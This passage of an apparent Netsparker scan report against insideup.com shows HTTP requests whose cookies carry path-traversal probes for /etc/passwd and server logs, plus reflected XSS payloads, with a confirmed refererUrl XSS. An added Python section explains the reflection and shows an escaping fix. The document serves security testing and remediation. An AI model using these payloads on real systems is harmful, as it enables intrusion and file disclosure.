OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 323
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004D5)%3c%2fscript%3e&lastName=Smith&password1=3&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:49 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=6A836EF41DEA790792C5633FD9018675; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1

action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter     Type  Value
_rememberme   POST  3
password      POST  password
refererUrl    POST  '"--></style></script><script>alert(0x0004D9)</script>
rememberme    POST  true
username      POST  username

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 162
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

_rememberme=3&password=password&refererUrl='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004D9)%3c%2fscript%3e&rememberme=true&username=username

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:53 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=FEA569566541D6A27921A659561BB3E0; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="'"--></style></script><script>netsparker(0x0004D9)</script>"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="'"--></style></script><script>netsparker(0x0004D9)</script>"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> 
<form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0004D9)&lt;/script&gt;'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 formError" /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> ..
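The confirmed response above reflects the refererUrl canary into three hidden inputs of the same page: the first two (the loginForm and communityLoginId forms) echo it raw inside value="...", where the leading '" closes the attribute and the following > closes the tag, so the trailing <script> element is parsed as markup; the third form (action="communitysignup.html") entity-encodes the same value, so it stays inert there. A fix applied to one template therefore does not close the finding. The Python below is an added example, not part of the Netsparker report or of the insideup.com application: it walks a response body, classifies every value= attribute that follows name="refererUrl" as raw, encoded or absent, and shows the attribute-encoding that the third form already applies. The sample response is a constructed excerpt of those three reflections; the function names, the attribute regex and the render_hidden helper are assumptions of this example. The same check applies to the lastName finding below by changing the parameter name.

```python
import html
import re

# Canary from the report's refererUrl finding. The request body sends
# netsparker(0x0004D9); the parameter table shows the equivalent alert() form.
# The '" prefix closes either quote style, --> closes a comment, the stray >
# closes a tag, and </style></script> escape those contexts before <script>.
CANARY = "'\"--></style></script><script>netsparker(0x0004D9)</script>"

# Constructed sample: the three refererUrl reflections of the confirmed
# response above, trimmed to the attribute in question. Forms 1 and 2 echo
# the value raw; form 3 entity-encodes it (as the real response did).
SAMPLE_RESPONSE = (
    '<form id="loginForm" method="post"> '
    '<input type="hidden" name="refererUrl" value="\'"--></style></script>'
    '<script>netsparker(0x0004D9)</script>"> </form> '
    '<form method="post" id="communityLoginId"> '
    '<input type="hidden" name="refererUrl" value="\'"--></style></script>'
    '<script>netsparker(0x0004D9)</script>"> </form> '
    '<form method="post" action="communitysignup.html"> '
    "<input type=\"hidden\" name=\"refererUrl\" value='&#039;&#034;--&gt;"
    "&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0004D9)"
    "&lt;/script&gt;'/> </form>"
)

# Assumed attribute shape: name="..." somewhere before value= in the same tag.
# The opening quote character of value= is captured so we can find its close.
ATTR_RE = re.compile(r'name="(?P<name>[^"]+)"[^>]*?value=(?P<q>["\'])')


def classify_reflections(body, param, canary):
    """Return one verdict per value= attribute that belongs to `param`:

    'raw'     - the canary sits byte-for-byte after the opening quote, so its
                own quote and '>' terminate the attribute and the tag: the
                <script> that follows is real markup (attribute breakout);
    'encoded' - the attribute holds the canary only after entity decoding,
                i.e. the server escaped it and the browser treats it as text;
    'absent'  - the parameter was not reflected into this attribute.
    """
    verdicts = []
    for m in ATTR_RE.finditer(body):
        if m.group("name") != param:
            continue
        quote, start = m.group("q"), m.end()
        if body.startswith(canary, start):
            verdicts.append("raw")
            continue
        end = body.find(quote, start)
        attr = body[start:end] if end != -1 else body[start:]
        verdicts.append("encoded" if html.unescape(attr) == canary else "absent")
    return verdicts


def is_exploitable(verdicts):
    """One raw reflection is enough; encoded copies elsewhere do not help."""
    return "raw" in verdicts


def render_hidden(name, value):
    """Hardened rendering for the hidden input: entity-encode the value
    (quotes included) before placing it in a double-quoted attribute, which is
    what the third form on the page does and the first two do not."""
    return '<input type="hidden" name="%s" value="%s">' % (
        html.escape(name, quote=True),
        html.escape(value, quote=True),
    )


if __name__ == "__main__":
    found = classify_reflections(SAMPLE_RESPONSE, "refererUrl", CANARY)
    print("reflections:", found, "exploitable:", is_exploitable(found))
    fixed = render_hidden("refererUrl", CANARY)
    print("after fix:", classify_reflections(fixed, "refererUrl", CANARY))
```

Run against the constructed sample the verdicts are raw, raw, encoded: the finding stands on the first two forms alone, and a retest after a fix must show no raw verdict in any reflection point, not just the one that was patched.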
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

